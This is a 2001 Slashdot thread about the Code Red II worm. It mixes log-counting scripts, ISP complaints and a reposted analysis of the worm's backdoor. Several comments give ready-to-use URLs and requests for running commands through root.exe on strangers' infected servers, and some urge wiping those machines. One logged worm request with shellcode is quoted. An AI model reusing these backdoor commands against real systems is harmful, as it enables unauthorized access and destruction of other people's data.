I have logged 27 attempt in the last 5 minutes from Sprint Broadband customers. This could really get annoying. The main problem I see is that even though I am not vulnerable to the attack, my ability to monitor for other attacks is being diminished. A determined hacker could easily attempt to slip in with all the noise.
Apparently @home is monitoring it's customers for Code Red.
I'd JUST reinstalled Win2k Pro on a new system, I'd added IIS for my own purposes and before I had a chance to run the service pack and patch, I got the Code Red worm (ok, so I was lazy and tired and was going to leave it for the morning)
@home unbound my cablemodem until I'd cleared the worm (disable IIS, reboot).
normally, I'd be a little annoyed at @home for monitoring my connection and cutting my connection rather than just block all traffic to that IP at router level. but hey, it saved me from contributing to a problem.
If you're hearing rhetoric about Linux, open source, or Mac and everyone's bashing Microsoft, you've found Slashdot.
Mod parent UP! That made my DAY!
one better than mcleodeight
This is what I used.. Nothing much, but I find it somewhat useful :)
LOGFILE=/home/httpd-1.3.20/logs/access_log
echo `cat $LOGFILE | grep default.ida\?NNN | cut -d ' ' -f 1` | tr ' ' "\n" | uniq | sort > old.cr
echo `cat $LOGFILE | grep default.ida\?XXX | cut -d ' ' -f 1` | tr ' ' "\n" | uniq | sort > new.cr
echo `grep -c default.ida $LOGFILE` > total.cr
echo `cat $LOGFILE | grep default.ida | cut -f 1 -d ' ' | uniq | wc -l` >> total.cr
When you execute 'dir', 'type', etc. the output get printed to the stdout and returned to you via HTTP but if you run notepad.exe the Win32 API is addressed and a window might pop up on the server. I espect this behaviour because AFAIK Windows doesn't allow remote GUI logins (not sure about telnet/ssh logins).
Monkey sense
and wc -l
grep -c default.ida access*
we've been slow for the last week! no other explanation than codeRed of course
I'm out of my mind right now, but feel free to leave a message.....
Never gonna happen.. its illegal to write and/or release worms in many states/countrys, no matter for what purpose.. If Microsoft releases it, they will never admit it.. Plus, it would take bandwith to scan for more hosts to "save" and if there was bugs on the code (its Microsoft, there MUST be bugs on the code!) the results could be impredictable..
More, Microsoft wants to conquer the world and become a new government, not destroy the world and rule a bunch of roaches! =)
Holiday weekend here in Canada...one more day of this. Oh boy.
Carousel is a lie!
10.0.0.0 seems fine too...
Err... looks like I forgot to close the tag. D'oh!
political_news.c: warning: comparison is always true due to limited range of data type
"Code red algorithm"??? It's called a random ip scan. In this variation, it's called a scan of the local subnet with a random ip thrown in every now and then. There's nothing special about it.
It's fast because that's how exponential growth works.
Slow service? I don't know about other @home customers (I'd like to hear) but my net connection was completely _down_ for about 8 hours this afternoon. As a matter of fact I just got back on.
The interesting thing was that the "cable" light on my cable modem was still on when usually when I can't get on the net it is off.
So I wonder what the problem really was. If maybe the routers were all up but the dhcp servers were down or something....
Anyone else have similar problems?
I don't use DHCP (it didn't seem to work well for multiple IPs), so I don't think that's it. Service has been touch and go for the past 30 hours or so, although it's relatively stable this evening. When service was down, I would ping my subnet's default gateway, and not receive a response. I subscribe to 2 IPs, on different subnets, and they've both been affected at various different times.
Personally, I feel that if this continues, @Home needs to credit me back part of my subscription fee.
If you read the Micro$oft EULA it is basically unwarrented for anything. Furthermore, M$ limits their liability to the cost of the software or $5 US, whichever is more.
Personally, I think the time for talking is over. It's time for what we used to call "muscle" during labor strikes. M$ deserves a little muscle right now.
I am logging about 50 attempts per hour and nearly all of them are coming from IPs within my ISP (61.x.x.x). This is a 5MB wireless network and it seems to be very busy tonight.
You really think that your average windows luser moron will actually put two and two together? Come now get real. They will probably just hit the home button so they can go to MSN and catch up with the latest Britteny Spears news.
War is necrophilia.
195 total, 78 within my Class B... All telocity users in my class b.
"Nature doesn't care how smart you are. You can still be wrong." - Richard Feynman
It even works from a browser. Just use http://IP/scripts/root.exe?/c%20dir%20/s%20\* where "IP" is the address of the server.
Is there a way to just disable IIS? I think that'd be the best solution.
I got a multi-homed box in a colo that's hitting hit with multiple attacks/second. No performance biggy, but I'd like to start neutralizing this. My log files are getting big. Guess I'll make a PHP script to keep track of this stuff.
For what exactly do you have IT dept anyway? If marketing dept does all the decicions regarding computer software (and hardware also, it may be hard to run IIS on a non-x86) and web design company does your server setup what can IT dept do? Take the blame? There's a big difference between web designer and web developer/administrator. And designer should not say anything about platform. Period.
_________________________
Spelling and grammar mistakes left as an exercise for the reader.
First, DoS are illegal..
Second, imagine that it runs some important software, other than the webserver, that can not stop and someones life/job depends on it.. imagine that its an hospital or something else.. Would you like to have the blood of innocent on your hands, just because you dont like Microsoft?..
Why DoS and go to jail (if its a corporation) when you can email and er.. live happilly ever after on freedom?
This variant installs a backdoor. Whenever you're attacked, your host should automatically respond by telnetting into the back door, installing the MS IIS patch, and send the sysadmin a $250 'consulting fee' for fixing their server. (This is slightly different than the oft-suggested "why not making a patching worm?")
Back on a serious note: How long will it be before someone starts suing the owners for letting their computer be a platform for an attack? Not long, I fear. I guess we'll see a huge upsurge in linux and apache installations when that day comes, though.
I have been hit over 35 times in 12 hours, way more then the first code red
Modest doubt is called the beacon of the wise - William Shakespeare
for the past 30 minutes ive gotten about 150 requests 95% of them on the 24.* range like this one..
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 278
... this is going to be a very interesting night
24.5.192.239 - - [05/Aug/2001:01:45:12 -0400] "GET
I also get N's from time to time
[alk]
Several @home customers have written about slowed service today, but they're definitely not alone.
I've had slowed service today, but I think that's because I've been using Mozilla (which is now up to 69,428K in memory usage).
ok then your [sic] infringing on my copyright! Could you as [sic] me next time before STEALING my comments for your own?
Do you think the RIAA cares what happens to their web server? They'd love it if the entire Internet went down in flames, which we're told is what will happen if code red or some variant that actually worked would clog every pipe entirely. Their puny web server would be a small price to squeeze out all the bandwidth being used by mp3s.
Yes, and where you have an unpatched IIS install, you often get a wide-open FTP server running as well. It's been making for some interesting browsing.
This is different. They were exclusively being threatened but the UDA for spam.
The real culprit with this is that people are running unsecured, unpatched IIS.
I think locking down local port 80 would cause more problems than good.
Even for windows users, a 120.00 linksys box and some know how will protect you. At least close the blatent problems and protect your internal network.
You see, the problem with that is my mother-in-law. She runs Windows98, has a cable modem and loves to play on the internet. I was visiting recently and wanted to use her computer to check my email. When I turned her computer on, I was physically ill watching the system tray fill up with 80 icons for ridiculous garbage nobody would ever need. 4 free trials to online services. 3 virus scanners (1 inactive). Various monitor "applications" for the video system, sound system, etc etc etc. Broken shortcuts all over the desktop. Had never run windows update. Never defragged the hard disk. That "some know how" you're talking about just doesn't exist in the world of my mother-in-law, and there are many, many more just like her who think "securing my computer" means making sure nobody breaks in and steals it. Don't hold your breath waiting of my mother-in-law to suddenly wake up, install linux and a firewall and become an 31337 h4x0r.
We don't have a state-run media we have a media-run state.
you must not read enough. this idea has been tossed around all the time. the thing is its illegal thing to do ... it fights fire with fire but its still illegal. why would anyone want to get arrested for fixing the net anyway?
back to parseing my log file :)
Why don't they cover this now, when it might actually do some good?
Man, I'm glad that I'm not using Minesweeper. This new virus exploits an unexploded mine in Minesweeper, and it does use Outlook and the stupidity of users. Luckily, I'm running OpenMine, so I'm not at risk. In fact, OpenMine has protected me from 2^37-302 virii. And just look at the millions of dollars that I've saved using OpenMine. I hope that this OpenMine takes off, along with OS/2. Unfortunately, my doghouse has to pay for the stupidity of Microsoft: this virus sucked 212 nibbles of bandwidth!
"Evil company X is threatening to restrict our rights! Let's all get together to stop--OOOH! SHINEY!!!" -- AC
This is LAME. Believe me, there is more to life than annoying people just because you can. A lot more.
grep ida /foo/bar/log | awk '{print $1}' | sort | uniq |\
awk '{print "<a href=\"http://" $1 "\">" $1 "</a><br>"}'
Carousel is a lie!
I'm having the same thing happen here in Indy, on the Speedway segment. Connection seems to occasionally drop (seems like overnight), though online light still stays on. I reset modem and it can take over an hour to fully come back online. Tech support has no clue.
So, now that the news is out about the rootkit, two things are happening. First, there are a few crackers out there somewhere that are installing even more cunning rootkits or trojans on the systems that are infected and at the same time covering their tracks. Second, there are a lot of hackers out there helping cover the crackers tracks with curiosity and well meant stuff.
For grins, can't the network adapters be shut down from a command prompt?
Does the income I've derived from working with Unix belong to SCO?
Power to the Peaceful
just wait till the trolls get a hold of that one... images of "the receiver" and "the giver" opening up on untold millions of pc's worldwide... this will be friggin hilarious!
Aug 5 00:04:13 nano kernel: Packet log: input DENY ppp0 PROTO=6 204.172.72.112:4474 208.162.198.38:80 L=48 S=0x00 I=56830 F=0x4000 T=119 SYN (#19)
65.4.97.166 This guy is an Alcoholic IT professional.
65.4.29.5 This one has a 'secure' login. And it wants to know your 1040 return date.
65.4.1.33This one says fuck us government. Contact:sysadmcn@yahoo.com.cn
Slashdot is a waste of time, I hope to continue in that tradition.
http://www.qwest.com/dsl/customerservice/win675ups .html
I think that 2.4.1 was one of the patches that resolved this security issue:
http://www.cisco.com/warp/public/707/CBOS-multiple .shtml
and remember: if you want to get anything out of this, call it a Windos Worm when you talk to non-free friends.
yes, I know Unix worms do exist. but last time I checked, <i>all</i> of the recent large-scale infections were windos-based, plus a Unix worm would by far not propagate that easily and quickly. bonus point: it wouldn't be in visual basic.
Assorted stuff I do sometimes: Lemuria.org
Yes, quite easy actual, the line to get a directory listing would be: GET /scripts/root.exe?/c+dir HTTP/1.0
Just wanted to add my own shell script for producing a list...
/var/log/apache/access.log | awk '{print $1}' | sort
grep default.ida
Well, with everyone feeling the need to chime in about what ranges they see like we did when we were taking bets if school would be canceled, I just felt like saying:
Nothing from the 192.168.0.x range here!!
=)
Wheeeee
I have seen some interesting solutions to this and since I can't quickly bring up a web server to try it, let me suggest trying a buffer exploit on CodeRed. Instead of sending a 404 to the GET default.ida request, send back a string of trash that is longer than any default.ida file could be. Maybe it'll choke...
Does the income I've derived from working with Unix belong to SCO?
And all on the night that I decided to net-install FreeBSD.
It's a good thing otherwise I'd have to forward him a note documenting his case and how to resolve the issue.
Or maybe just walk over and hand him a copy of Apache.
Ben
Work Safe Porn
Checking through my snort logs I only see this new variation making attempts on a very small set of the IP addresses in my netblock. After poking around a little I found that ALL of these machines were running services on port 80. Has anyone else seen this? Is this new version checking to see if the service exists before it sends the http request?
Dozings.com -- Its kinda funny... If you're as crazy as me.
That other guy is funny. You are not.
Modify the code red code to apply the security patch to the vulnerable IIS servers and reboot the system? While this is potentially destructive to your system (I'm told -- MS security patches and all that) it would pretty well take care of this problem...
Nah, this will just make the sysadmins even lazier.
SysAdmin #1: Dude, your NT machines are all infected with Code Red!
SysAdmin #2: I know! I'm just waiting for for them to be infected with the fix... should be any day now...
"And like that
I'm getting hammered from the 61.*.*.* range, too... and I'm just on a laptop with a dialup. Aren't I glad I run Apache and not IIS to do local web dev... - John
i did the same thing to.. 315 hits from 24.*.*.* on my my logs
Not in Quebec.
Of course, I'd never run IIS on my workstation, let alone a server, but it's fun to watch the HTTP requests come in on ZA.
Now, let's see if ZA logs contain enough information to determine if it's a Code Red attack or just another port scanner....
The next Slashdot story will be ready soon, but subscribers can beat the rush and slashdot the links early!
Instead of turning it off (which doesn't really help until you have the very latest firmware), you should forward incoming port 80 [to some non-existant box on your LAN], and you're router won't try and parse them any more.
would someone please write a variant that will nuke the c: drive of any infected computer.
I run apache on win32 (I don't like that, either. I wanted to run linux, but my family needs to use this box, too) and I saw another message that mentioned a good response to the code red worm (http://INFESTED SERVER'S ADDY/scripts/root.exe?+/c+start+http://www.digital island.com/codered/) and I was wondering if there was a way to make my instance of apache automatically send out this request. Now I know that if had linux running here, I'd just write a quick shell script to do the dirty work, but that's simply not an option. And as long as I'm asking questions here, wouldn't there be some better page to send them to, or perhaps a script command to knock the worm out? (although that could potentially be troublesome since it might have to delte some of their stuff and crash their machines)
I also am an @Home subscriber, it seems to have gotten a lot worse for me in the past hour.
I'm just suprised with all the <sarcasm>excellent media coverage</sarcasm> that more hype wasn't made about possible attacks today.
I guess crappy reporting takes the weekend off.
I'm not really at threat from this latest version, but I still don't like the fact I'm getting slammed like this.
1. It makes a copy of CMD.EXE called ROOT.EXE in the;
\inetpub\scripts
and
\program files\common files\system\msadc
directories. Does this on both drive C: and D: (doesn't fail if D: doesn't exist).
2. It then runs its attack program code to infect itself upon numerous other boxes. This is done randomly, although there is a bias to attack boxes that are part of the same class A as infected attacker (so it hits your own boxes sooner rather than later). Attack code runs for 24 hours, 48 hours on Chinese language systems.
3. After attack code runs (and it seems to be based on clock ticks, not date), it then writes out a Trojan.
File Explorer.exe (8192bytes or 7K as displayed by Windows) is dropped (from the code in the original attacking URL) to the root of drive C: and D: (again, doesn't matter if D: doesn't exist).
4. The system is then rebooted (probably a forced reboot).
5. When the system restarts, it loads the trojan Explorer.exe from the root directory on the boot drive. This code then does several things;
a) Launches the real Explorer.exe, so the system looks normal.
b) Sets SFCDisable in hklm\software\microsoft\windows nt\currentversion\winlogon to some undocumented value. Presumably this disables Windows File Protection (so critical files could be overwritten)
c) Creates two virtual directories (via the registry) in hklm\system\currentcontrolset\services\w3svc\param eters\virtual
roots. Called "C" and "D", they are mapped to the root directories of
the two drives and permissions are established in the virtual
directory to allow script, read, and write access as well as setting
execute permissions to scripts and executables.
d) goes into an endless sleep loop.
The end result of all of this action is to leave your box wide open to remote connection and total compromise.
Unlike "Code Red", this worm doesn't attack any single target at any point, although its attack strength seems to be much higher (it launches 300 threads right off, although some may only launch 100), so its propagation seems much higher.
The attack only works properly on Windows 2000 systems (preliminary analysis). ICSA Labs tested against an NT 4.0/IIS 4.0/SP3 box and received a standard error message. Reports from subscribers suggest that XP IIS 5.1 RC1 is invulnerable also. Its expected that it works on PWS and OWS equally to IIS (all on W2K).
Its obviously a short-lived attack, at least the process of collecting victims. What would be done with them once collected is another story. No attempt is made by the worm to send anything "home", although detecting compromised boxes is far too easy (very unfortunately) for anyone outside your network.
Cleaning a compromised box should really be done by reformatting. Although logging is left on for the new virtual directories created (meaning you'd see access in your IIS logs), there's really no way to be sure that files haven't been implanted to leave other backdoors (not as part of this worm, but as part of the use of the opening it creates).
Credits:
The bulk of the analysis was done by Nick Fitzgerald of Virus-L (and friends) and Roger Thompson of TruSecure. Additional help came from Bruce Hughes of the ICSA Labs.
Cheers,
Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
It would be quite ironic and amusing if someone launched a bunch of "cure" email messages with a "fix" attached, when in fact it's, you guessed it...
Code Red 3!
Code Red
Code Red 2: Code Harder
Code Red 3: Code With a Vengence
POST /scripts/root.exe HTTP/1.0
dir
??
Me
Probably somebody who found out how to use the root.exe executable... I have see this only once so far, the rest are just 404's (in the most exotic languages).
bash$
welcome. Don't mind the trolls who'll call you names. This is really a friendly place. :)
ok, here it is.. the bestest best code red log checker... checks for cr1 and 2 and gives basic stats before flooding your console with IPs..
hope ya like it... do whatever ya feel like with it.. BSD license.
#!/bin/sh
echo Code Red Log Checker by MoOsEb0y
if [ $# -ne 1 ]
then
echo 'usage:'
echo 'cr.sh '
echo 'Use . for the path to scan current directory'
exit 3
fi
echo Checking for Code Red 1 Attacks...
echo -n 'unique IPs:'
cat $1/* | grep NNNNN | awk '{print $1}' | sort | uniq | wc -l
echo -n 'total hits:'
cat $1/* | grep NNNNN | awk '{print $1}' | wc -l
echo Checking for Code Red 2 Attacks...
echo -n 'unique IPs:'
cat $1/* | grep XXXXX | awk '{print $1}' | sort | uniq | wc -l
echo -n 'total hits:'
cat $1/* | grep XXXXX | awk '{print $1}' | wc -l
echo 'Would you like a detailed report on the IPs attacking your server'
echo -n '(may be long if you run a high-traffic server) (Y/N)?'
read OK
if [ " $OK" = " y" -o " $OK" = " Y" ]
then
echo 'Infected Code Red 1 Hosts:'
cat $1/* | grep NNNNN | awk '{print $1}' | sort | uniq
echo 'Infected Code Red 2 Hosts:'
cat $1/* | grep XXXXX | awk '{print $1}' | sort | uniq
echo 'Infected Code Red 1 and 2 Hosts:'
cat $1/* | grep NNNNN | grep XXXXX | awk '{print $1}' | sort | uniq
echo 'end of listings'
fi
Greping my logs has never been so fun !!!
Nah, that was just the first occurrence on your subnet. It had to get there somehow. Even though this thing is concentrating on subnets, it must branch out or otherwise it wouldn't've propagated outside the subnet it started on. I'm seeing it on 66; others are reporting it on 4, 24, and more.
Liberty in your lifetime
I can't seem to figure out how to post a new comment, only reply to ones already posted. How do I post a comment?
Code Red I: 1.2 billion dollars
Code Red II: > 1.2 billion dollars (presumably, since it's badder than the original)
Being a trolling AC on Slashdot: priceless
There are some things that money can't buy. For everything else, there's Micro$oft.
I wrote a crude script that does this but mails information to abuse departments of ISPs where they can match up the hosts with their users and contact them if they wish. The parent poster may want to add this feature to his code, and I might clean my code up later and post it.
If there is an open IIS webserver on the Internet running on a mission critical system then the people deserve to be taken out. The only thing running a web server should be a dedicated web server box. If you can't afford to have the box go down due to other stuff running on it, you need to rethink running web services on it. BTW: A hospital? If a hospital ran IIS on anything life threatening I'd sue them for malpractice. :-)
The worm not only affects windows machines.. It also taxes the inftrastructure.
several ISPs w/ proxy cache servers are noticing the hit as their machines try to handle the traffic.
also, code red also affects other devices other than win2k.... [eg: cisco 600 dsl modems... which do not replicate the worm, but are affected by it due to a separate unrelated bug] and other products as well that have built in IIS servers (including some "hardware" products that have IIS emmedded... yes... there are some out thre that are affected)
It affects unix machines that are having to respond to the "get" request
--
Time is on my side
Considering that Apache is the most widely used web server you'd think it would be attacked more. OK maybe the apache folk are nice and ethical people who don't call people comminists or un-american and therefore don't piss off as many people but still a kiddie is not that selective.
War is necrophilia.
Just tried it. The question I asked was "will code red ii sink microsoft". The answer was... guess what...no, not that one, we're talking about Code Red here, not Sircam.
It was: "Most likely".
If you have Qwest DSL is seems you are out of luck. They will not give you Any information you need to download the CBOS upgrades from Cisco (I am on the phone with them now) The guy I am talking to says they have the 2.4.1 upgrade but thats it (and no one there knows the URL for it to boot).
Ok phone call is over. I asked the tech why I cannot have the keys I need to get the patches from Cisco and he tells me it would be like handing me a registration key for WIN 98 when I don't own it. Excuse me if I am mistaken but I HAVE the router. In fact I have three of them because they would rather send me a new one when ever I have a connection outage for more than a few hours rather than admit they are having network problems. I swear I am switching my ISP on Monday...
http://support.microsoft.com/support/kb/articles/Q 202/0/13.ASP
May I suggest iisreset /stop?
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
"So after the last 20 root exploits of Linux and Apache, we shouldn't use that either?"
I believe the last time something this bad hit *nix platforms was about 1988, and it was called Morris.(Yeah, I know it was Sendmail and finger, but you get my point, no?)
You know, you're missing the point. A well set up UN*X box takes very little administration. The cost of administering a UN*X box will normally be lower than a Windows box doing the same job, because although the administrator costs more, you need h[im|er] for fewer hours.
I'm old enough to remember when discussions on Slashdot were well informed.
I had some fun with this one: (URL follows) http://{infected-IP}/scripts/root.exe?/C%20dir%20c :\%20/S
one, two, one two like a duck
The "too busy" reply happens for any HTTP request, as one would expect, but suggests that something beyond hosting the trojan is happening to the compromised machines. Either they're getting a lot of HTTP requests from somewhere, or something is happening on them.
I think someone needs to write virii to combat these Code Red virii....although that would probably increase the network slowdown...for a while anyways..
Notice the gratuitous X's instead of N's...
Of course, Apache just laughs back with a 404.
Don't sweat the petty things. But do pet the sweaty things.
So after the last 20 root exploits of Linux and Apache, we shouldn't use that either?
Hmm. I guess that means I'm back to my VIC-20!
Has anyone figured out how to execute commands using a POST request to root.exe? My curiosity (heh heh :)) has made me play with it a bit (but not too much, don't want the feds knocking on my door asking me what the phrase "Hacked by Chinese!" means to me) .. I can't seem to figure it out.
I tried variants of the following:
<HTML>
<BODY>
<FORM METHOD="POST" ACTION="http://xx.xx.xx.xx/scripts/root.exe">
<INPUT TYPE="SUBMIT" NAME="" VALUE="exit ">
</FORM>
</BODY></HTML>
trying to send exit to the shell, but the "script" (root.exe) never finishes. I'm guessing that the data is coming over the pipe but lynx won't show it to me until the request is finished. I tried passing the NAME %1, %2, etc. (DOS style) but that didn't work either.
As soon as I get a directory listing I am going to have a moment of silence for all these poor fucks.
--
Well, if the web server which you're running is IIS and you're affected...then you can't trust your logs as you don't know how many types of attacks have succeeded and how many people are using your system.
WHY do i have to pay extra for the functionality of NOT being succeptable to virii and net attacks?
:-p
Actually, you don't. Linux is free
We don't have a state-run media we have a media-run state.
All you do-gooders who are flitting around deleting root.exe -- nice job. Now there is no way to actually interact with the remote machine to remove the rest of the code, until it's reinfected anyway
Just keep an eye out to security.debian.org. There was a fix for an apache remote exploit on July 28.
Also, that's the fix, it doesn't say when the problem arised.
Despite the best intentions you will be breaking the law. Keep that in mind.
Several of us in #ljr on openprojects.net have being getting this for ages.
I'm getting one atack about every 20 minutes, most are from servers that dont have anything on, although I've had a couple of "real" websites attack me.
http://isorox.dyndns.org/~iso/ is a monitoring thing.
Yeah, but you can fix that by running the update tool (up2date isn't it) shortly after you first log on.
My only political goal is to see to it that no political party achieves its goals.
What you need to do is add /c followed by the command to the end of the url as a query parameter. For example:
GET /scripts/root.exe?/c+net+send+localhost+"Your+comp uter+is+infected+with+Code+Red+2.+See+www.incident s.org+for+instructions+on+how+to+remove." HTTP/1.0
This command (without the spaces that slashdot inserts) will pop up a message box on the local machine with the specified message.
The problem is, www.incidents.org only has instructions on removing the orignal CodeRed. Nothing on removing the new variant, which also requires removing explorer.exe from c:\. So, I'd like to be able to use a better URL, if I had one.
--LeBleu
If you're reading this you're part of the mass hallucination that is Kevin the Blue.
I'm going to have to defend the guy as I run Windows as well.
In Depth Knowledge of FP2000 - Any of ya'll actually use this crap? I can't figure it out. I have clients that do EVERYTHING in FP and on occasion I'm called in to help them out. I COULD tell them to pick up Dreamweaver, but most are unwilling to pay for it...they use FP as it came bundled. I COULD tell them how to do everything from notepad and then how to set up an FTP connection through the cli, but if I did that I wouldn't be working for them. I wish I knew how people used this piece of crap software as I've never been able to get it to do crap for me, yet idiots seem to figure it out enough to connect to their servers and screw up pages. In this sense, ya use what the client is using...if you don't you aren't much of a consultant.
Same goes with Windows. I tell all my users that I can set up *nix boxes for their networks. This would be really fricken cool IF I was on site more than an hour or two a month. These guys all want to admin their own servers and to be honest, the costs saved by doing it themselves far outweigh the cost of getting zapped by any of the worms - so far - for a small business. If you can't afford a full time WinAdmin, you certainly can't afford a full time UnixAdmin.
WinAdmins are a dime a dozen and EVERYONE knows enough to be able to set these damn things up. Most businesses I deal with have a semi-dedicated winadmin whom is part network assistant / mostly something else. Its something I can show a business how to do in an afternoon with a few small books left in case they need them.
On the other hand, I have a thousand page UNIX book that I still consider a starters guide that I've used for over 10 years now - "UNIX System V Release 4 - An Introduction" and it doesn't even cover things like Apache or SendMail in depth (or at all...I can't remember...I got enough other books on those subjects). Its a fricken introduction for christ's sakes. I could have gotten a few MCSE's from a book that size.
So fuck it...if ya'll want to play the assholes and be all high and mighty about how 'l33t ya'll are go ahead. Its exactly the reason you had no friends in high school. Geeks think they are always right and everyone else is wrong. Its the same attitude the jocks had, but worse.
I HATE M$ and I wouldn't suggest using it to anyone, BUT if someone suggests it to me, I'm going to give them the best service I can on that platform and I'm not going to turn my nose up at them. And YES, I did get hit by RedCode last time and this was after doing everything M$ said to do...Oops, apparently if you make any changes to the system AFTER you've done these, certain things will reenable all the changes you've made. I've now got a system where my boys have to go through a tedious proceedure ANYTIME they [install / uninstall / reconfigure] anything on my WinServers to ensure that nothing was undone. To be honest, it wouldn't be a bad practice on *nix to do the same thing and reaffirm all patches / etc stayed intact after installs. With the new RPMs (ok they are new to me...I'm use to installing with a MAKE) you don't know what the hell is being upgraded or what dependencies are being imported a good deal of the time.
Shit, anymore its almost simpler than Winders...rpm some app and find they've rewritten your secured files with something wide open and the win boys will be laughing at all you dumbass linux people...now who'd CLI over an app without knowing what was on it?
have it go nuts infecting, then on the 20th instead of ddos'ing some static ip, ddos microsoft by all grabbing the patch at once.
You're not alone. I only regret that the first worm wasn't that aggressive.
Look at his street address...
- Get infected by Code Fix
- Get a list of CR-infected hosts from logfile
- Infect all CR-infected hosts with Code Fix
- Install ISS-patch and reboot
You could also just loop for eg. ten hours and monitor for attempts made by Code Red, infecting the originating servers with Code Fix. When the 10 hours is up, install ISS-patch and reboot.Ya know.. heh.. Gibson is one of the folks capable of authoring a fine beast such as Code Red. I'd almost go so far as to say "few" folks capable of doing it.. Mr. Gibson, Sir? Where were you on the night of July 31, 2001?
The same CNN that was holding a CodeRed vigil this week, predicting the impending doom of the internet as we know it is once again missing the boat.
No story on CNN about what is probably one of the most embarrassing days for Microsoft EVER: Millions of people have access to a root trojan on millions of consumer boxes. AND THIS IS A COMPANY THAT WANTS TO INTRODUCE PASSPORT!! WTF!
Note to corporate manager: Take your head out of your *ss. If your "IT" guy missed the first CodeRed and now your dealing with this. It's time to find a new "IT" guy. Preferably one with a reasonably big large against Micro$oft products.
Also, if anyone is interested in a surprisingly GOOD article about Microsoft's arrogance read this month's IEEE Spectrum.
------ Tim O'Brien
@Home is indeed apparantly getting hit hard.
-- Veni, vidi, dormivi
grow your pr0n collection? augment your NJB usage? Someone already posted a request that will search for mp3s - just change mp3 to (xxx|harddcore|sex) :)
They that quote Benjamin Franklin on liberty and safety deserve neither.
Unless you have a way of serving at port 80 and logging how many hits take place there, you won't know. I would consider getting a personal copy of ZoneAlarm and blocking port 80 to begin with if you are not serving pages, rather than trying to get a peek at what's coming through. It might cause you more damage later on when you least expect it.
of hits on port 80, I started checking, they all ran IIS, I forwarded off a list of them to the abuse people as per technical support, they refused to help any more stating it wasn't there problem.
"stays crunchy even" you say?
The licensing issue is irrelevant too. If my microwave catches fire, I can sue somebody. If my custom-built house collapses, I can sue somebody. If my shotgun explodes, I can sue somebody.
First of all, the question is not IF you can sue SOMEBODY. You can ALWAYS sue somebody. The question is, does your case stand a chance in hell of being won?
Secondly, who would we sue if Linux was found to have a serious flaw like the one in IIS? Don't you dare say the flaw would be fixed, because the flaw in IIS has already been patched, about 2 months ago, well before Code Red came out.
"And like that
The vulnerabilty istelf is NOT in the IIS service, but in the indexing service that needs IIS to work. The indexing service is installed with IIS4 on NT, IIS5 on 2000. [it is also installed with the PWS on 2kpro]
BTW IIS3 is also vulnerable somewhat, but since it has many, many other holes, the only remedy for IIS3 is to upgrade to at least IIS4 + patches.
--
Time is on my side
net send 127.0.0.1 Your machine is compromised
I deliberately started apache (as an @home customer i'm not 'supposed' to run servers) just to watch the incoming Code Red connections... in the past 4 hours, i've seen 215 connections, most of which from the same class B as me: cr806461-a:/var/log/apache# cat error.log | grep "24.156" | awk {' print $8 '} | uniq | wc -l 143 This one is spreading fast!
careful - the new strains use default.ida?XXXXXXX. Just grepping for default.ida should be enough...
Turning the web server off is not enough - it will still crash it. Your only course of action is to either:
1) Contact your ISP, have your connection changed to a static IP if it isn't already, and use RFC1483 bridging.
2) Upgrade to version 2.4.2 of the CBOS firmware.
it fights fire with fire but its still illegal.
It fights fire with water... A fire in someone else's house... Which would have set your house on fire too, except it's made of fireproof material (or you have a "firewall" between your houses).
May or may not be legal when you look at it that way. I'm pretty sure you can legally break into someone's house if you see flames coming out of the roof.
ok then your [sic] infringing on my copyright! Could you as [sic] me next time before STEALING my comments for your own?
Holy shit! I just ran that against my logs, and I've got 493 so far!
:)
Good thing I'm running Apache
You can accomplish anything you set your mind to. The impossible just takes a little longer.
> Wouldn't the best and quickest fix be to telnet into the machines and give 'em the old:
c:\deltree windows
> maybe we could even install scripts on our own servers to automatically do this each time we recieve a new attack. Automated windows repair solutions.
That's my idea too.
Maybe not deleting \windows only. Wipe all the machine. At least, the cry out would be such, that no-one will ever install IIS.
Btw, I whish that the first worm had done that. 309 000 servers wiped off, including sonme of the update.microsoft.com (and as this worm also scan private subnets, I bet that half of microsoft serves would have died). Woooov. This would have rocked.
Internet black day.
according to ntbugtraq, the worm copies cmd.exe to the scripts dir under iis. i've been getting a lot of these now in my snort log:
[**] [1:1002:1] WEB-IIS cmd.exe access [**]
[Classification: Attempted User Privilege Gain] [Priority: 8]
08/04-20:59:21.340539 165.247.90.38:3711 -> 165.247.246.23:80
from different ip's etc.
--- d'oh
Nope, it works. I just checked. It would be *amazingly* trivial to wipe this poor bastard's hard drive right now... Golly, the power is making me dizzy. :)
:)
The deal is that it's running the root.exe (actually cmd.exe) as a cgi process. Look it up for specifics.
Now, I wonder if I should bother at least finding a way to alert these people. For example, I could probably do something like run IE and have it go to a page about Code Red. Assuming the machine has a monitor and is in use by people (probably the case for most of the DSL IPs, anyway), the person will come back to their machine to find info ready for them. Or it might just pop up while they're using it!
For those who are interested in the source:
http://www.kryptolus.com/red.txt
On another note, a server whose identity I will not name(solaris w/ apache) was hit with 17000 attacks as of yesterday(the server handles a lot of ips).
--
Violators will be prosecuted and prosecutors will be violated.
I pointed my browser at some of the IP's that tried to infect my machine. I found the following pages (or variants of the following (red on black):
fuck CHINA Governmentfuck PoizonBOx
contact:sysadmcn@yahoo.com.cn
fuck USA Government
fuck PoizonBOx
contact:sysadmcn@yahoo.com.cn
sex0r lowd l33tn3ss
sex0r geeklab.org
contact:lowd@geeklab.org
If my enemy's enemy is my friend, what happens if my enemy is his own worst enemy?
I've had 155 hits so far ("grep /default.ida /etc/httpd/logs/access_log") - most of them have been within the last 24 hours or so.
Not that I'm vulnerable (running Linux, OpenBSD, Apache and all), but it's still an annoyance.
-- Ed Carp, N7EKG erc@pobox.com PGP KeyID: 0x0BD32C9B What I'm up to: http://intuitives.mine.nu
1/8: random
4/8: 192.168.x.x
3/8: 192.x.x.x
This would be consistent with my logs, I've been hit about 100 times now.
Oh hell yeah, without a doubt.
Intelligent Life on Earth
